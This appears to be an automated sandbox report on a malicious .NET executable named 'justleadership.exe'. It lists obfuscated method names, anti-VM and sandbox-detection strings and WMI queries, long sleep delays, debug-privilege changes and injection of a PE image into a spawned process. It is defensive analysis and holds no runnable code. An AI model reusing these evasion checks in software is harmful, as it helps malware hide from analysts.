                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, dtKME3FDc6j3rDD0TG0.csHigh entropy of concatenated method names: 'pc4FULwDvx', 'e9PAW8PSefImhjop0qt', 'B638lsPfwmqb9I9lkdV', 'KZvLcZPECSfI2GgZcug', 'Kxd6KAPTHZxKymY8TOU', 'Aue5KxPrFGEik7M8PnG', 'OqOlEPPZ55Ekqe8MG75', 'UhLNtBPXLHj5ZqHwtOx', 'BrykBcP2cpPiIoHE7my', 'XQGLsGPh0TiaWh2BqnI'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, mjkG0pFKuWb2elvhQh0.csHigh entropy of concatenated method names: 'XDO34GkTR9', 'eiyo0aadkgQg7BB8xBq', 'G16Ll6atElV7StEqhwV', 'Fl6ZDDa5nrKoBedxD46', 'Go7JI0alMQbyxC1G1sQ', 'F0ftdYa8qOf61QyjtSB', 'iqwjykaUmX0hRoX9QQb', 'U3rTcwaxAoOJAS0d1QO', 'Yd0eOna04LSAbKbNDEM'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, LnXMW5YLnd99XKi9u9o.csHigh entropy of concatenated method names: 'aNsYKueKqc', 'nBEs2JK7PZfSOIaB1FG', 'kFjTZfKiwa1FZBe4dY3', 'kFpbgZKBhIo7kUNCdU7', 'jiS78HKImlTNQn7bwWf', 'JAYXT7Kc9DVwHIlYJPN', 'NxtUBnKYC2ZMruDAWxb', 'Vc2wKjKV9MwS6YyGQt3', 'xPV9H2KqLRXq0Wv4Y06'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, nHVKcaVt2psstHNjQvx.csHigh entropy of concatenated method names: 'KYnVlt5WWo', 'Ix5K5FxMc6PhVD7bBRY', 'IoBqMTx6RtCRifPXPGh', 'RdRxqFxmyqhVMgerTEH', 'XUDkrax3xSILQ9uMKt3', 'B1ScObxWyhxrvN6qtkD', 'GvdIO0xpLKUe0TGUJ2t', 'Y048I4xspN9NyTdYOwo', 'd3GAqrxJZMPKCWXt1dH', 'lBMEgYxn9QV2gmGXccp'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, bwvNQaFd072Hc2YmXnF.csHigh entropy of concatenated method names: 'gtlF5usUP6', 'JNWFlX3dfs', 'e2sJFvPUIIGhx6GfKOq', 'jPoUChPdPd3Ood2PbY0', 'kJ10EmPtgyf4w4ofWrY', 'lcaY1SPDdvv37scy1N8', 'BIPUfqP8OWt1kr3qdmU', 'KnKyhwP53tuGyPthV3H', 'nr9lNHPlYEexcicISrj', 'msyPg9PxeOl3rRRtfCE'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, BQX11lY6oX7kEem0G3x.csHigh entropy of concatenated method names: 'GKFYp2IpK5', 'GmkYsrMZI0', 'Ql4Y3xB5lY', 'dMSYW6lZkk', 'ljCumkKvrW2WJlr5XGU', 'h6TrcMKO7iCTVSWb2cd', 'Mf8MBtKkBJTFnvI7xT4', 'l56D0PKw2EAH1OuwBHQ', 'jijrL0K4NVPotL1hPDp', 'vgCcqXK1O3ZNlnqv9iA'
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: justleadership.exe PID: 6640, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL@\KQ
                    Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\KQ
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORERJSBIEDLL.DLLKCUCKOOMON.DLLLWIN32_PROCESS.HANDLE='{0}'MPARENTPROCESSIDNCMDOSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREPVERSIONQSERIALNUMBERSVMWARE|VIRTUAL|A M I|XENTSELECT * FROM WIN32_COMPUTERSYSTEMUMANUFACTURERVMODELWMICROSOFT|VMWARE|VIRTUALXJOHNYANNAZXXXXXXXX
                    Source: C:\Users\user\Desktop\justleadership.exeMemory allocated: 1690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeMemory allocated: 1690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeMemory allocated: 18A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeMemory allocated: 5230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exe TID: 6676Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exe TID: 6676Thread sleep time: -38961s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                    Source: C:\Users\user\Desktop\justleadership.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\justleadership.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware\V
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareLRkq
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen@\kq
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq 1:en-CH:VMware|VIRTUAL|A M I|Xen
                    Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HXHDX OMPBA5H7CP@\kq0VMware|VIRTUAL|A M<,t
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWareLRkqD
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq 1:en-CH:Microsoft|VMWare|Virtual
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: explorerJSbieDll.dllKcuckoomon.dllLwin32_process.handle='{0}'MParentProcessIdNcmdOselect * from Win32_BIOS8Unexpected WMI query failurePversionQSerialNumberSVMware|VIRTUAL|A M I|XenTselect * from Win32_ComputerSystemUmanufacturerVmodelWMicrosoft|VMWare|VirtualXjohnYannaZxxxxxxxx
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen(_kq
                    Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\kq
                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 7lPk2bnBC8GWF8b TdZa51Ph@\kq0Microsoft|VMWare|V<
                    Source: justleadership.exe, 00000000.00000002.2119536181.0000000001445000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\justleadership.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\justleadership.exeMemory written: C:\Users\user\Desktop\justleadership.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeProcess created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Users\user\Desktop\justleadership.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Users\user\Desktop\justleadership.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
